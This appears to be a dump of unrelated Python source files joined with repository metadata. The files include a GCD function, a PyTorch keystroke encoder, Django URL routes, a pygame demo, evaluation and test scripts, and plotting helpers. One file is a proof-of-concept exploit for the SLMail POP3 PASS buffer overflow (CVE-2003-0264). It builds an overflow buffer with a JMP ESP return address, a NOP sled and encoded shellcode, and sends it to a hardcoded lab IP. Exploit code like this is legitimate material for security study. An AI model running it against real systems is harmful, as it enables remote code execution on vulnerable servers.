def gcd1_2(m,n):
    """Binary (Stein) GCD via a recursive helper.

    Prints one trace line per recursive step and returns gcd(m, n);
    the factor-of-two accumulator k is multiplied back in at the end.
    """
    print("gcd1_2")

    def loop(m, n, k):
        print("gcd1_2, loop",m,n,k)
        # Base case: the surviving operand times the accumulated power of two.
        if m == 0 or n == 0:
            return abs(n * k) if m == 0 else abs(m * k)
        m_even = m % 2 == 0
        n_even = n % 2 == 0
        if m_even and n_even:
            # 2 divides both, so it divides the gcd: strip it into k.
            return loop(m // 2, n // 2, k * 2)
        if m_even:
            # 2 divides only m, so it cannot be part of the gcd.
            return loop(m // 2, n, k)
        if n_even:
            return loop(m, n // 2, k)
        # Both odd: the difference is even, and halving it drops no odd factor.
        if m <= n:
            return loop(m, (n - m) // 2, k)
        return loop(n, (m - n) // 2, k)

    return loop(m, n, 1)
print(gcd1_2(18,48))
|
[
"swimtw@naver.com"
] |
swimtw@naver.com
|
dbce7481439b0de5401a7b81de4c4d300404aa6b
|
6388104b646b304a081985216ad2f82f09db2af3
|
/slmail-pop3.py
|
67f374a5ffac594a45f6cfba7a7c22230d03e945
|
[] |
no_license
|
war4uthor/CVE-2003-0264
|
73bd207d3f989434be942982d344285633f6fc48
|
82352386a3e740db37f84ebbaed2632965c4c0a8
|
refs/heads/master
| 2020-04-12T12:41:00.763220
| 2018-12-19T22:50:30
| 2018-12-19T22:50:30
| 162,499,093
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,955
|
py
|
#!/usr/bin/python
import socket
# Proof-of-concept for CVE-2003-0264 (SLMail 5.5 POP3 PASS overflow).
# Python 2 syntax (print statements). Do not run outside a lab target.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# 5F4A358F FFE4 JMP ESP
shellcode = (
"\xb8\x9a\x26\x16\x98\xd9\xcd\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x52\x83\xea\xfc\x31\x42\x0e\x03\xd8\x28\xf4\x6d\x20\xdc\x7a"
"\x8d\xd8\x1d\x1b\x07\x3d\x2c\x1b\x73\x36\x1f\xab\xf7\x1a\xac"
"\x40\x55\x8e\x27\x24\x72\xa1\x80\x83\xa4\x8c\x11\xbf\x95\x8f"
"\x91\xc2\xc9\x6f\xab\x0c\x1c\x6e\xec\x71\xed\x22\xa5\xfe\x40"
"\xd2\xc2\x4b\x59\x59\x98\x5a\xd9\xbe\x69\x5c\xc8\x11\xe1\x07"
"\xca\x90\x26\x3c\x43\x8a\x2b\x79\x1d\x21\x9f\xf5\x9c\xe3\xd1"
"\xf6\x33\xca\xdd\x04\x4d\x0b\xd9\xf6\x38\x65\x19\x8a\x3a\xb2"
"\x63\x50\xce\x20\xc3\x13\x68\x8c\xf5\xf0\xef\x47\xf9\xbd\x64"
"\x0f\x1e\x43\xa8\x24\x1a\xc8\x4f\xea\xaa\x8a\x6b\x2e\xf6\x49"
"\x15\x77\x52\x3f\x2a\x67\x3d\xe0\x8e\xec\xd0\xf5\xa2\xaf\xbc"
"\x3a\x8f\x4f\x3d\x55\x98\x3c\x0f\xfa\x32\xaa\x23\x73\x9d\x2d"
"\x43\xae\x59\xa1\xba\x51\x9a\xe8\x78\x05\xca\x82\xa9\x26\x81"
"\x52\x55\xf3\x06\x02\xf9\xac\xe6\xf2\xb9\x1c\x8f\x18\x36\x42"
"\xaf\x23\x9c\xeb\x5a\xde\x77\x1e\x90\xe0\xd7\x76\xa4\xe0\xd6"
"\x3d\x21\x06\xb2\x51\x64\x91\x2b\xcb\x2d\x69\xcd\x14\xf8\x14"
"\xcd\x9f\x0f\xe9\x80\x57\x65\xf9\x75\x98\x30\xa3\xd0\xa7\xee"
"\xcb\xbf\x3a\x75\x0b\xc9\x26\x22\x5c\x9e\x99\x3b\x08\x32\x83"
"\x95\x2e\xcf\x55\xdd\xea\x14\xa6\xe0\xf3\xd9\x92\xc6\xe3\x27"
"\x1a\x43\x57\xf8\x4d\x1d\x01\xbe\x27\xef\xfb\x68\x9b\xb9\x6b"
"\xec\xd7\x79\xed\xf1\x3d\x0c\x11\x43\xe8\x49\x2e\x6c\x7c\x5e"
"\x57\x90\x1c\xa1\x82\x10\x3c\x40\x06\x6d\xd5\xdd\xc3\xcc\xb8"
"\xdd\x3e\x12\xc5\x5d\xca\xeb\x32\x7d\xbf\xee\x7f\x39\x2c\x83"
"\x10\xac\x52\x30\x10\xe5")

# Layout: 2606 bytes to EIP, 4-byte return address (0x5F4A358F, little-endian,
# a JMP ESP), 16-byte NOP sled, 351-byte shellcode, then C-padding to 3500.
buffer = "A"*2606 +"\x8f\x35\x4a\x5f" + "\x90" * 16 + shellcode + "C"*(3500-2606-4-351-16)

try:
    print "\nSending evil buffer..."
    s.connect(('10.11.25.84', 110))
    data = s.recv(1024)
    s.send('USER username' + '\r\n')
    data = s.recv(1024)
    # The overflow is in the PASS command handler.
    s.send('PASS ' + buffer + '\r\n')
    print "\nDone!."
except:
    print "Could not connect to POP3!"
|
[
"root@localhost.localdomain"
] |
root@localhost.localdomain
|
574e6816db82fec92e4c415548263fb7ef3a52d2
|
ab149b8f1f20bf2212bead49fdf5bd6bf5330b89
|
/model/encoder.py
|
f5b18c46738890812e0f004126797488274a0a76
|
[
"MIT"
] |
permissive
|
wheeltune/kid-neuro
|
69ecf08717d82660cf0e6eccd406c0cad9f24f1e
|
131ec888e4f0c3ee1d7b4c4ebf57a6b1d5323d8a
|
refs/heads/main
| 2023-06-04T06:07:45.074418
| 2021-06-21T23:54:27
| 2021-06-21T23:54:27
| 375,545,888
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,559
|
py
|
import torch.nn as nn
from .norm_layer import NormLayer
__all__ = ["KeystrokesEncoder"]
#===============================================================================
class KeystrokesEncoder(nn.Module):
    """Two-stage LSTM encoder over keystroke sequences.

    Input features are key-code features (d_codes wide) concatenated with
    4 timing features; the output is the final hidden state of the second
    LSTM stack (one d_hidden vector per sequence).
    """
    #---------------------------------------------------------------------------
    def __init__(self, d_codes, d_hidden, n_layers, p_rnn_dropout=0.2, dropout=0.5):
        super().__init__()
        self.d_codes = d_codes
        self.d_times = 4
        self.d_model = self.d_codes + self.d_times
        self.d_hidden = d_hidden
        self.p_dropout = dropout
        self.p_rnn_dropout = p_rnn_dropout

        # Both LSTM stacks share the same layer/dropout/batch-first settings.
        shared_rnn_cfg = dict(
            num_layers=n_layers,
            dropout=self.p_rnn_dropout,
            batch_first=True,
        )
        self.batch_norm_1 = NormLayer(self.d_model)
        self.rnn_1 = nn.LSTM(self.d_model, self.d_hidden, **shared_rnn_cfg)
        self.batch_norm_2 = NormLayer(self.d_hidden)
        self.dropout = nn.Dropout(self.p_dropout)
        self.rnn_2 = nn.LSTM(self.d_hidden, self.d_hidden, **shared_rnn_cfg)

    #---------------------------------------------------------------------------
    def forward(self, x):
        # Normalize -> first LSTM -> normalize -> dropout -> second LSTM.
        h = self.batch_norm_1(x)
        h, _ = self.rnn_1(h)
        h = self.batch_norm_2(h)
        h = self.dropout(h)
        # Keep only the last layer's final hidden state as the embedding.
        _, (final_hidden, _) = self.rnn_2(h)
        return final_hidden[-1]
#===============================================================================
|
[
"wheeltune@gmail.com"
] |
wheeltune@gmail.com
|
1c08ed7ab24404b2203e81b4ad894448a0dedbfd
|
efd4e7d85e2ae17853513e846ffce08288e3ff7b
|
/My_profile/urls.py
|
2abf6fd7317aee120b4a64f0256870f5a5802713
|
[] |
no_license
|
bodawalan/Django_blog
|
e033bbb5547f17b668f2a582f71700f4a1353184
|
43b9505708a18dbb9da28cad020f1ae90d5a0e0e
|
refs/heads/master
| 2021-01-19T11:29:42.448736
| 2017-04-12T20:06:21
| 2017-04-12T20:06:21
| 87,970,789
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 268
|
py
|
from django.conf.urls import url,include
from django.contrib import admin
from My_profile import views
urlpatterns = [
    #url(r'^', views.Name_view),
    url(r'^address', views.Address_view),
    url(r'^contact', views.contact),
    # Catch-all: must stay last or it would shadow the routes above.
    url(r'^', views.Name_view),
]
|
[
"nishit687539@gmail.com"
] |
nishit687539@gmail.com
|
523d338761f9c0eeceeea3dc1511eeec56a1d292
|
2cef2c608bde91a8e2deb4f88d62e164fce9a0e3
|
/4 - sprites and animations/Codebeispiele/first_sprite.py
|
493830ae10edf48a32b7a4e9df3906a845dee76f
|
[] |
no_license
|
mimuc/mmp-ss21
|
3be6c67e1951f673e5a28d1c1fd44fe2dfe4cb47
|
e20c5363b0ddf1866b7b7c044da7bb9a8330af20
|
refs/heads/master
| 2023-05-31T07:43:44.275815
| 2021-06-21T11:58:13
| 2021-06-21T11:58:13
| 355,538,628
| 5
| 5
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 652
|
py
|
import pygame
from pygame.locals import *
class Box(pygame.sprite.Sprite):
    """A 20x20 solid-colour sprite anchored at a fixed position."""

    def __init__(self, color, initial_position):
        pygame.sprite.Sprite.__init__(self)
        self.image = pygame.Surface((20,20))
        self.image.fill(color)
        # rect drives where blit() draws the sprite.
        self.rect = self.image.get_rect()
        self.rect.topleft = initial_position

    def update(self):
        # Sprite-protocol hook; this box never moves.
        pass
pygame.init()
screen = pygame.display.set_mode((640, 480), 0, 32)

# One red box at the top-left corner.
box = Box((255,0,0),(0,0))
while True:
    # Drain the event queue; closing the window exits the process.
    for event in pygame.event.get():
        if event.type == QUIT:
            exit()
    # Clear, draw the sprite, flip the frame.
    screen.fill((0, 0, 0))
    screen.blit(box.image,box.rect)
    pygame.display.update()
|
[
"florian.bemmann@ifi.lmu.de"
] |
florian.bemmann@ifi.lmu.de
|
45ee8e725516dbf7e4470dd77fffccc3827108a8
|
98897a706b48f40ac34cf6d1722e086bd87043ff
|
/analysis_everglades/game_logic/test_battle.py
|
fa4026e51646220353ca57eb39ad74a07ab9862b
|
[] |
no_license
|
shaunhyp57/everglades
|
dae28fb1695443fb6bb0a1e7c81d50b320dba400
|
e4aab93d7fe8147ed3917605b2755ed429884b84
|
refs/heads/master
| 2022-04-25T03:07:24.999084
| 2020-04-27T16:32:12
| 2020-04-27T16:32:12
| 238,527,762
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,750
|
py
|
## Static Imports
import os
import importlib
import gym
import gym_everglades
import pdb
import numpy as np
from everglades_server import server
## Input Variables
# Agent files must include a class of the same name with a 'get_action' function
# Do not include './' in file path
agent0_file = 'agents/base_rushV1.py'
#agent1_file = 'agents/same_commands.py'
agent1_file = 'agents/random_actions.py'

config_dir = 'config/'
map_file = config_dir + 'DemoMap.json'
setup_file = config_dir + 'GameSetup.json'
unit_file = config_dir + 'UnitDefinitions.json'
output_dir = 'game_telemetry/'

debug = 1

## Specific Imports
# Dynamically import each agent module and pull out the class that shares
# the file's basename (e.g. agents/base_rushV1.py -> class base_rushV1).
agent0_name, agent0_extension = os.path.splitext(agent0_file)
agent0_mod = importlib.import_module(agent0_name.replace('/','.'))
agent0_class = getattr(agent0_mod, os.path.basename(agent0_name))

agent1_name, agent1_extension = os.path.splitext(agent1_file)
agent1_mod = importlib.import_module(agent1_name.replace('/','.'))
agent1_class = getattr(agent1_mod, os.path.basename(agent1_name))

## Main Script
env = gym.make('everglades-v0')
players = {}
names = {}

players[0] = agent0_class(env.num_actions_per_turn, 0)
names[0] = agent0_class.__name__
players[1] = agent1_class(env.num_actions_per_turn, 1)
names[1] = agent1_class.__name__

observations = env.reset(
    players=players,
    config_dir = config_dir,
    map_file = map_file,
    unit_file = unit_file,
    output_dir = output_dir,
    pnames = names,
    debug = debug
)

actions = {}

## Game Loop
done = 0
while not done:
    if debug:
        env.game.debug_state()
    # Collect each player's actions for this turn, then advance the game.
    for pid in players:
        actions[pid] = players[pid].get_action( observations[pid] )
    observations, reward, done, info = env.step(actions)
    # Per-step reward for both players.
    print(reward)
|
[
"shaunhyp57@knights.ucf.edu"
] |
shaunhyp57@knights.ucf.edu
|
c4ce2e6ba48d68bd21ff577fd3d57c7571c05689
|
50e6d7c4f7c3fe5127f4cc4634d6e9acdf8f5e17
|
/evaluate_cpu_only.py
|
cb4b463f79c79755652b1a74c1effe49460c817c
|
[
"MIT"
] |
permissive
|
Tiamat-Tech/gcn-cnn
|
907500a2cd4b42a1d5e43192b1b09956db02ccbd
|
6f9c685dd9ac9567746aa1904e549ecc00a7a712
|
refs/heads/master
| 2023-03-17T17:06:54.800458
| 2021-03-09T19:30:09
| 2021-03-09T19:30:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,552
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Nov 20 11:01:07 2019
Compute the performance metrics for graphencoder model
performance metrics includes iou, pixelAccuracy
@author: dipu
"""
import torch
from torchvision import transforms
import torch.nn.functional as F
import pickle
from scipy.spatial.distance import cdist
import numpy as np
import init_paths
from dataloaders.dataloader_test_2 import *
from dataloaders.dataloader_test_2 import RICO_ComponentDataset
import models
import opts_dml
import os
from BoundingBox import BoundingBox
from BoundingBoxes import BoundingBoxes
from utils import mkdir_if_missing, load_checkpoint
from eval_metrics.get_overall_Classwise_IOU import get_overall_Classwise_IOU
from eval_metrics.get_overall_pix_acc import get_overall_pix_acc
def main():
    """Evaluate the trained graph encoder on RICO retrieval (CPU only).

    Extracts embeddings for query and gallery splits, ranks gallery items by
    Euclidean distance, then reports class-wise IoU and pixel accuracy at
    top-1/5/10.
    """
    opt = opts_dml.parse_opt()
    os.environ["CUDA_VISIBLE_DEVICES"] = opt.gpu_id
    # Evaluation configuration: gallery-only retrieval with the strided decoder.
    onlyGallery = True
    opt.use_directed_graph = True
    opt.decoder_model = 'strided'
    opt.dim =1024
    boundingBoxes = getBoundingBoxes_from_info()
    model_file = 'trained_models/model_dec_strided_dim1024_ep35.pth'
    data_transform = transforms.Compose([ # Not used for 25Channel_images
            transforms.Resize([255,127]),
            transforms.ToTensor(),
            transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
        ])
    model = models.create(opt.decoder_model, opt)
    #resume = load_checkpoint(model_file)
    # CPU-only: map the checkpoint onto the CPU and keep the model off CUDA.
    resume = torch.load(model_file, map_location=torch.device('cpu'))
    model.load_state_dict(resume['state_dict'])
    #model = model.cuda()
    model.eval()
    loader = RICO_ComponentDataset(opt, data_transform)
    q_feat, q_fnames = extract_features(model, loader, split='query')
    g_feat, g_fnames = extract_features(model, loader, split='gallery')
    # Optionally add the training split to the gallery pool.
    if not(onlyGallery):
        t_feat, t_fnames = extract_features(model, loader, split='train')
        g_feat = np.vstack((g_feat,t_feat))
        g_fnames = g_fnames + t_fnames
    # Per-batch feature arrays -> one (num_images, dim) matrix per split.
    q_feat = np.concatenate(q_feat)
    g_feat = np.concatenate(g_feat)
    # Rank gallery images per query by ascending Euclidean distance.
    distances = cdist(q_feat, g_feat, metric= 'euclidean')
    sort_inds = np.argsort(distances)
    overallMeanClassIou, _, _ = get_overall_Classwise_IOU(boundingBoxes,sort_inds,g_fnames,q_fnames, topk = [1,5,10])
    overallMeanAvgPixAcc, _, _ = get_overall_pix_acc(boundingBoxes,sort_inds,g_fnames,q_fnames, topk = [1,5,10])
    print('The overallMeanClassIou = ' +  str(['{:.3f}'.format(x) for x in overallMeanClassIou]) + '\n')
    print('The overallMeanAvgPixAcc = ' +  str(['{:.3f}'.format(x) for x in overallMeanAvgPixAcc]) + '\n')
def extract_features(model, loader, split='gallery'):
    """Encode every batch of *split* and collect normalized encoder features.

    Iterates loader.get_batch(split) until the loader reports a wrapped epoch.
    Returns (list of per-batch numpy arrays, list of image ids in batch order).
    """
    feat = []
    fnames = []
    epoch_done = False
    # Scoped no_grad instead of torch.set_grad_enabled(False), which silently
    # left autograd disabled globally after this function returned.
    with torch.no_grad():
        while epoch_done == False:
            data = loader.get_batch(split)
            # Batch arrives as numpy; convert each graph tensor for the model.
            sg_data = {key: torch.from_numpy(data['sg_data'][key]) for key in data['sg_data']}
            x_enc, x_dec = model(sg_data)
            # L2-normalize embeddings so Euclidean ranking matches cosine.
            x_enc = F.normalize(x_enc)
            outputs = x_enc.detach().cpu().numpy()
            feat.append(outputs)
            fnames += [x['id'] for x in data['infos']]
            if data['bounds']['wrapped']:
                # Loader signals it has cycled through the whole split.
                epoch_done = True
    print('Extracted features from {} images from {} split'.format(len(fnames), split))
    return feat, fnames
# prepare bounding boxes information for RICO dataset
def getBoundingBoxes_from_info(info_file = 'data/rico_box_info.pkl'):
    """Build a BoundingBoxes collection for the RICO dataset from a pickle.

    The pickle maps image name -> {nComponent, xywh, componentLabel,
    iconClass, textButtonClass}; one BoundingBox is added per component.
    NOTE(review): pickle.load executes arbitrary code — only load trusted files.
    """
    allBoundingBoxes = BoundingBoxes()
    info = pickle.load(open(info_file, 'rb'))
    #files = glob.glob(data_dir+ "*.json")
    for imageName in info.keys():
        count = info[imageName]['nComponent']
        for i in range(count):
            # xywh box plus the component's class annotations.
            box = info[imageName]['xywh'][i]
            bb = BoundingBox(
                imageName,
                info[imageName]['componentLabel'][i],
                box[0],
                box[1],
                box[2],
                box[3],
                iconClass=info[imageName]['iconClass'],
                textButtonClass=info[imageName]['textButtonClass'])
            allBoundingBoxes.addBoundingBox(bb)
    print('Collected {} bounding boxes from {} images'. format(allBoundingBoxes.count(), len(info) ))
    # testBoundingBoxes(allBoundingBoxes)
    return allBoundingBoxes
#%%
if __name__ == '__main__':
main()
|
[
"dips4717@gmail.com"
] |
dips4717@gmail.com
|
730e91b4e0c6f30bc58e9e97cc1c8d759cb3c311
|
3cc416df0c4697aa0f2dffb4d94e89f5cb62ec0e
|
/api/hypem/urls.py
|
baef22a54a09b3ed3a47056df93c2fb6c183a468
|
[] |
no_license
|
guess/hypem
|
308ed022839e603056467ac9bff36b33cef438a5
|
028aaec7007fdf9d0f593cac463b7a5cd91b36b1
|
refs/heads/master
| 2016-09-10T14:33:04.402081
| 2015-03-07T20:21:41
| 2015-03-07T20:21:41
| 31,442,249
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 227
|
py
|
from django.conf.urls import patterns, include, url
from django.contrib import admin

# URL routes: Django admin plus a single catch-all route that forwards three
# path segments (two word groups, one number group) to hypem.views.home.
# NOTE(review): patterns() and string view references were deprecated in
# Django 1.8 and removed in 1.10 — confirm the project's Django version.
urlpatterns = patterns('',
    url(r'^admin/', include(admin.site.urls)),
    url(r'^(\w+)/(\w+)/(\d+)', 'hypem.views.home', name='home'),
)
|
[
"stevetsourounis@gmail.com"
] |
stevetsourounis@gmail.com
|
9e1bdaa9a0888f3ccb9eba4f462b36b5688e2936
|
2bf1ffde9ed692e27c34d23b67babd95f8f5644d
|
/tests/test_naming.py
|
6fa54b180e6d20e00b54c2fda549cc654ac5e57b
|
[
"MIT"
] |
permissive
|
pvrk/python_backup
|
9dea3d657e619902aebbdcfc236b4eac9c302609
|
d61af53490c791bac1226062af7744a69b335ce9
|
refs/heads/master
| 2022-03-21T06:25:11.638414
| 2019-12-17T17:50:25
| 2019-12-17T17:50:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,233
|
py
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# --------------------------------------------------------------------------
"""Unit tests for Naming."""
import unittest
from asebackupcli.naming import Naming
class TestNaming(unittest.TestCase):
    """Unit tests for class Naming, written table-driven where possible."""

    def test_backup_type_str(self):
        """backup_type_str maps the is_full flag to its string form."""
        for is_full, expected in ((True, 'full'), (False, 'tran')):
            self.assertEqual(Naming.backup_type_str(is_full=is_full), expected)

    def test_type_str_is_full(self):
        """type_str_is_full is the inverse mapping of backup_type_str."""
        for type_str, expected in (('full', True), ('tran', False)):
            self.assertEqual(Naming.type_str_is_full(type_str), expected)

    def test_construct_filename(self):
        """construct_filename builds <db>_<type>_<ts>_S<idx>-<count>.cdmp."""
        common = dict(dbname="test1db", start_timestamp="20180601_112429",
                      stripe_index=2, stripe_count=101)
        self.assertEqual(
            Naming.construct_filename(is_full=True, **common),
            'test1db_full_20180601_112429_S002-101.cdmp')
        self.assertEqual(
            Naming.construct_filename(is_full=False, **common),
            'test1db_tran_20180601_112429_S002-101.cdmp')

    def test_construct_blobname_prefix(self):
        """construct_blobname_prefix yields only the db/type prefix."""
        self.assertEqual(
            Naming.construct_blobname_prefix(dbname="test1db", is_full=True),
            'test1db_full_')

    def test_construct_blobname(self):
        """construct_blobname includes both start and end timestamps."""
        blobname = Naming.construct_blobname(
            dbname="test1db",
            is_full=True,
            start_timestamp="20180601_112429",
            end_timestamp="20180601_131234",
            stripe_index=2,
            stripe_count=101)
        self.assertEqual(
            blobname,
            'test1db_full_20180601_112429--20180601_131234_S002-101.cdmp')

    def test_parse_ase_generated_filename(self):
        """parse_ase_generated_filename accepts only the ASE 'trans' form."""
        self.assertEqual(
            Naming.parse_ase_generated_filename('AZU_trans_20181205_091930_S01-11.cdmp'),
            ('AZU', '20181205_091930', 1, 11))
        self.assertIsNone(
            Naming.parse_ase_generated_filename('AZU_tran_20181205_091930_S01-11.cdmp'))

    def test_parse_filename(self):
        """parse_filename recovers db name, type, timestamp and stripes."""
        self.assertEqual(
            Naming.parse_filename('test1db_full_20180601_112429_S002-101.cdmp'),
            ('test1db', True, '20180601_112429', 2, 101))
        self.assertEqual(
            Naming.parse_filename('test1db_tran_20180601_112429_S02-08.cdmp'),
            ('test1db', False, '20180601_112429', 2, 8))
        self.assertIsNone(Naming.parse_filename('bad_input'))

    def test_parse_blobname(self):
        """parse_blobname extracts both timestamps plus stripe info."""
        self.assertEqual(
            Naming.parse_blobname('test1db_full_20180601_112429--20180601_131234_S002-101.cdmp'),
            ('test1db', True, '20180601_112429', '20180601_131234', 2, 101))
        self.assertEqual(
            Naming.parse_blobname('test1db_tran_20180601_112429--20180601_131234_S2-008.cdmp'),
            ('test1db', False, '20180601_112429', '20180601_131234', 2, 8))
        # NOTE(review): the original asserted parse_filename here, not
        # parse_blobname — preserved as-is, but it is likely a copy-paste slip.
        self.assertIsNone(Naming.parse_filename('bad_input'))

    def test_pipe_names(self):
        """pipe_names enumerates one named-pipe path per stripe."""
        expected = [
            '/tmp/backup_AZU_full_001_003.cdmp_pipe',
            '/tmp/backup_AZU_full_002_003.cdmp_pipe',
            '/tmp/backup_AZU_full_003_003.cdmp_pipe'
        ]
        self.assertEqual(
            Naming.pipe_names(dbname='AZU', is_full=True, stripe_count=3, output_dir='/tmp'),
            expected)
|
[
"chgeuer@microsoft.com"
] |
chgeuer@microsoft.com
|
b8f08a33fc0e8b8ddaecb9b9c29a5e20c4da5e32
|
047a9613723e6477e68624cb9c3aeb08bc1d4c8a
|
/src/_plotter.py
|
ab49aa83c46f2b322db46519f364eb23f4f35037
|
[
"MIT"
] |
permissive
|
phoenixding/cellar
|
512ca1c8fe580081b49ceadf7dfa81648739658d
|
4736b207e2b40a135f88cc2e677af620ea5ef20d
|
refs/heads/master
| 2023-02-22T05:42:30.902617
| 2021-01-31T16:39:20
| 2021-01-31T16:39:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,346
|
py
|
from typing import Optional, Union
import numpy as np
import plotly.express as px
from plotly.graph_objects import Figure
from anndata import AnnData
from .units import wrap
from . import reduce_dim_vis
from . import name_genes
# Fixed categorical palette of 28 hex colours. Not referenced elsewhere in
# this module — presumably consumed by importers for cluster plots; confirm.
COLORS = [
    '#cc5151', '#51cccc', '#337f7f', '#8ecc51', '#7f3333', '#597f33', '#8e51cc',
    '#59337f', '#ccad51', '#7f6c33', '#51cc70', '#337f46', '#5170cc', '#33467f',
    '#cc51ad', '#7f336c', '#cc7f51', '#7f4f33', '#bccc51', '#757f33', '#60cc51',
    '#3c7f33', '#51cc9e', '#337f62', '#519ecc', '#33627f', '#6051cc', '#3c337f'
]
def _find_gene_index(adata, gene):
if isinstance(gene, int):
if gene > adata.var.index.to_numpy().shape[0]:
raise ValueError("Index out of bounds.")
return gene
if not isinstance(gene, str):
raise ValueError("Incorrect gene format.")
if gene in adata.var.index.to_numpy():
return np.where(adata.var.index.to_numpy() == gene)[0]
if 'parsed_names' not in adata.var:
name_genes(adata)
if gene in adata.var['parsed_names'].to_numpy():
return np.where(adata.var['parsed_names'] == gene)[0]
if gene in adata.var['parsed_ids'].to_numpy():
return np.where(adata.var['parsed_ids'] == gene)[0]
return -1
def _plot_labels(
    adata: AnnData,
    show_title: Optional[bool] = False,
    return_fig: Optional[bool] = False
) -> Figure:
    """
    Helper function for plot.

    Scatter-plots the stored 2d embedding, coloured by cluster labels when
    present; computes the 2d embedding on the fly if it is missing.
    Returns the figure when return_fig is True, otherwise shows it.
    """
    has_labels = True
    if 'labels' not in adata.obs:
        # Fall back to an uncoloured embedding plot instead of failing.
        has_labels = False
        print("Labels not found. Plotting 2d embeddings.")
        #raise ValueError("Labels not found in object.")
    if 'x_emb_2d' not in adata.obsm:
        print("2d embeddings not found.")
        print("Running default visualization method.")
        reduce_dim_vis(adata)
    if has_labels:
        color = adata.obs['labels'].to_numpy().astype(str)
    # Name of the 2d-reduction method, used only to label the axes.
    method = adata.uns['visualization_info_2d']['method']
    fig = px.scatter(
        x=adata.obsm['x_emb_2d'][:, 0],
        y=adata.obsm['x_emb_2d'][:, 1],
        # `color` is only bound when labels exist; the conditional short-
        # circuits so the name is never evaluated otherwise.
        color=color if has_labels else None,
        hover_data={'Cell': adata.obs.index.to_numpy()},
        labels={
            'x': f'{method}1',
            'y': f'{method}2'
        },
        title=adata.uns['dataset'] if show_title else None,
        template='none'
    )
    if return_fig:
        return fig
    fig.show()
def _plot_gene(
    adata: AnnData,
    gene: Optional[Union[str, int]] = None,
    show_title: Optional[bool] = False,
    return_fig: Optional[bool] = False
) -> Figure:
    """
    Helper function for plot.

    Scatter-plots the 2d embedding coloured by the expression of `gene`.
    Returns the figure when return_fig is True, otherwise shows it; returns
    None (after printing a message) when the gene cannot be resolved.
    """
    if gene is None:
        raise ValueError("Please specify gene to plot.")
    index = _find_gene_index(adata, gene)
    # NOTE(review): _find_gene_index may return an int, a numpy index array,
    # or -1; `index == -1` on an array compares element-wise and only works
    # here because matches are single-element arrays — confirm.
    if index == -1:
        print("Gene not found.")
        return
    # Expression values of the selected gene drive the colour scale.
    color = adata.X[:, index]
    method = adata.uns['visualization_info_2d']['method']
    fig = px.scatter(
        x=adata.obsm['x_emb_2d'][:, 0],
        y=adata.obsm['x_emb_2d'][:, 1],
        color=color,
        hover_data={'Cell': adata.obs.index.to_numpy()},
        labels={
            'x': f'{method}1',
            'y': f'{method}2'
        },
        title=adata.uns['dataset'] if show_title else None,
        template='none'
    )
    if return_fig:
        return fig
    fig.show()
def _plot_scores(
    adata: AnnData,
    show_title: Optional[bool] = False,
    return_fig: Optional[bool] = False
) -> Figure:
    """
    Helper function for plot.

    Line-plots clustering evaluation scores against the number of clusters
    tried. Returns the figure when return_fig is True, otherwise shows it.

    Raises:
        ValueError: if no scores are stored in adata.uns['cluster_info'].
    """
    if 'scores' not in adata.uns['cluster_info']:
        raise ValueError("Scores not found in object.")
    eval_method = adata.uns['cluster_info']['eval_method']
    fig = px.line(
        x=adata.uns['cluster_info']['n_clusters_used'],
        y=adata.uns['cluster_info']['scores'],
        labels={
            'x': 'n_clusters',
            'y': f'{eval_method} score'
        },
        title=adata.uns['dataset'] if show_title else None,
        template='none'
    )
    if return_fig:
        # Bug fix: the original had the bare expression `return_fig` here
        # (a no-op), so callers asking for the figure always received None.
        return fig
    fig.show()
def plot(
    x: AnnData,
    by: Optional[str] = None,
    gene: Optional[Union[str, int]] = None,
    show_title: Optional[bool] = False,
    return_fig: Optional[bool] = False
) -> None:
    """
    Plotting entry point: dispatches to the label, gene-expression, or
    score helper based on `by`.

    Parameters
    __________
    x: AnnData object containing the data matrix and the plot keys.
    by: 'labels', 'gene', or 'scores'; None picks labels or gene depending
        on whether `gene` is given.
    gene: gene to colour by (ensembl id, gene name, or index); used only
        when by is None or 'gene'.
    show_title: whether to show the dataset name in the plot.
    return_fig: return the figure object instead of showing it.
    """
    # Guard clause: reject anything that is not an AnnData object.
    if not isinstance(x, AnnData):
        raise ValueError("Object not in AnnData format.")
    wants_labels = by == 'labels' or (by is None and gene is None)
    if wants_labels:
        return _plot_labels(x, show_title, return_fig)
    if by in (None, 'gene'):
        return _plot_gene(x, gene, show_title, return_fig)
    if by == 'scores':
        return _plot_scores(x, show_title, return_fig)
|
[
"euxhen_hasanaj@ymail.com"
] |
euxhen_hasanaj@ymail.com
|
99efab2a162ffa1089de10df2b63c489eb0dbd71
|
48c9af57aa1956d15b7335ea88dfbd44333c3998
|
/df_project_generate/__init__.py
|
d2d8463aa3df2da968f70d43fa907d725e4d6949
|
[] |
no_license
|
darfat/skp-jabar
|
eaf23685948fd6efd0604ef3a554b58a1cdd8bab
|
30861ae8eb1f37d1b3832043f297515f1a98b2e8
|
refs/heads/master
| 2021-01-22T13:12:16.658917
| 2014-10-06T09:11:54
| 2014-10-06T09:11:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 974
|
py
|
##############################################################################
#
# Darmawan Fatriananda
# BKD Pemprov Jabar
# Copyright (c) 2014 <http://www.asdarfat.wordpress.com.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#
##############################################################################
import wizard
